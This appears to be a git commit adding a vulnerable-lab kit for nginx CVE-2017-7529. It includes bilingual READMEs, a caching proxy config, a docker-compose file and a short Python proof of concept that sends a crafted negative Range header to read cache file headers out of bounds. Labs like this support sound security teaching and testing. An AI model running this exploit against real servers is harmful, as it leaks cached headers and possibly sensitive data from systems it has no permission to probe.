first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/nginx/CVE-2017-7529/01.png
+++ b/nginx/CVE-2017-7529/01.png
--- a/nginx/CVE-2017-7529/README.md
+++ b/nginx/CVE-2017-7529/README.md
@@ -0,0 +1,34 @@
+# Nginx Cache Leak by Integer Overflow (CVE-2017-7529)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Nginx is a web server that can be used as a reverse proxy, load balancer, mail proxy, and HTTP cache. When Nginx acts as a reverse proxy, it typically caches certain files, especially static files. The cached content is stored in files, with each cache file containing a "file header" + "HTTP response header" + "HTTP response body". If a subsequent request hits this cache file, Nginx will directly return the "HTTP response body" from the file to the user.
+
+Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
+
+If a request contains a Range header, Nginx will return content of specified length based on the start and end positions provided. However, if we construct two negative positions, such as (-600, -9223372036854774591), it becomes possible to read data from negative positions. If this request hits a cache file, we may be able to read the "file header" and "HTTP response header" that are located before the "HTTP response body" in the cache file.
+
+References:
+
+ - https://cert.360.cn/detailnews.html?id=b879782fbad4a7f773b6c18490d67ac7
+ - http://galaxylab.org/cve-2017-7529-nginx%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
+
+## Environment Setup
+
+Run the following command to start a Nginx server version 1.13.2:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080/` to see the Nginx default page, which is actually content reverse proxied from port 8081.
+
+## Vulnerability Reproduce
+
+Run `python3 poc.py http://your-ip:8080/` and check the returned results:
+
+![](01.png)
+
+As you can see, we've successfully read the "file header" and "HTTP response header" content located before the "HTTP response body" through out-of-bounds reading.
+
+If the reading is incorrect, try adjusting the offset address (605) in poc.py.
--- a/nginx/CVE-2017-7529/README.zh-cn.md
+++ b/nginx/CVE-2017-7529/README.zh-cn.md
@@ -0,0 +1,32 @@
+# Nginx越界读取缓存漏洞（CVE-2017-7529）
+
+Nginx是一款Web服务器，可以作为反向代理、负载均衡、邮件代理、HTTP缓存等。当Nginx作为反向代理时，通常会缓存一些文件，特别是静态文件。缓存的内容存储在文件中，每个缓存文件包括"文件头"+"HTTP返回包头"+"HTTP返回包体"。如果二次请求命中了该缓存文件，则Nginx会直接将该文件中的"HTTP返回包体"返回给用户。
+
+Nginx版本从0.5.6到1.13.2的nginx range filter模块存在整数溢出漏洞，当遇到特殊构造的请求时，会导致泄露敏感信息。
+
+如果请求中包含Range头，Nginx会根据请求中提供的start和end位置，返回指定长度的内容。然而，如果start和end位置为负数，例如(-600, -9223372036854774591)，则可能读取到负位置的数据。如果这次请求又命中了缓存文件，则可能就可以读取到缓存文件中位于"HTTP返回包体"前的"文件头"、"HTTP返回包头"等内容。
+
+参考阅读：
+
+ - https://cert.360.cn/detailnews.html?id=b879782fbad4a7f773b6c18490d67ac7
+ - http://galaxylab.org/cve-2017-7529-nginx%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
+
+## 漏洞环境
+
+执行如下命令启动一个Nginx 1.13.2服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/`即可查看到Nginx默认页面，这个页面实际上是反向代理的8081端口的内容。
+
+## 漏洞复现
+
+调用`python3 poc.py http://your-ip:8080/`，读取返回结果：
+
+![](01.png)
+
+可见，越界读取到了位于"HTTP返回包体"前的"文件头"、"HTTP返回包头"等内容。
+
+如果读取有误，请调整poc.py中的偏移地址（605）。
--- a/nginx/CVE-2017-7529/default.conf
+++ b/nginx/CVE-2017-7529/default.conf
@@ -0,0 +1,28 @@
+proxy_cache_path /tmp/nginx levels=1:2 keys_zone=cache_zone:10m;
+proxy_cache_valid 200 10m;
+
+server {
+    listen       8081;
+    server_name  localhost;
+
+    charset utf-8;
+
+    location / {
+        root   /usr/share/nginx/html;
+        index  index.html;
+    }
+}
+server {
+    listen       8080;
+    server_name  localhost;
+
+    charset utf-8;
+
+    location / {
+        proxy_pass http://127.0.0.1:8081/;
+        proxy_set_header HOST $host;
+        proxy_cache cache_zone;
+        add_header X-Proxy-Cache $upstream_cache_status;
+        proxy_ignore_headers Set-Cookie;
+    }
+}
--- a/nginx/CVE-2017-7529/docker-compose.yml
+++ b/nginx/CVE-2017-7529/docker-compose.yml
@@ -0,0 +1,7 @@
+services:
+ nginx:
+   image: vulhub/nginx:1.13.2
+   volumes:
+    - ./default.conf:/etc/nginx/conf.d/default.conf
+   ports:
+    - "8080:8080"
--- a/nginx/CVE-2017-7529/poc.py
+++ b/nginx/CVE-2017-7529/poc.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+import sys
+import requests
+
+if len(sys.argv) < 2:
+    print("%s url" % (sys.argv[0]))
+    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
+    sys.exit()
+
+headers = {
+    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
+}
+offset = 605
+url = sys.argv[1]
+file_len = len(requests.get(url, headers=headers).content)
+n = file_len + offset
+headers['Range'] = "bytes=-%d,-%d" % (
+    n, 0x8000000000000000 - n)
+
+r = requests.get(url, headers=headers)
+print(r.text)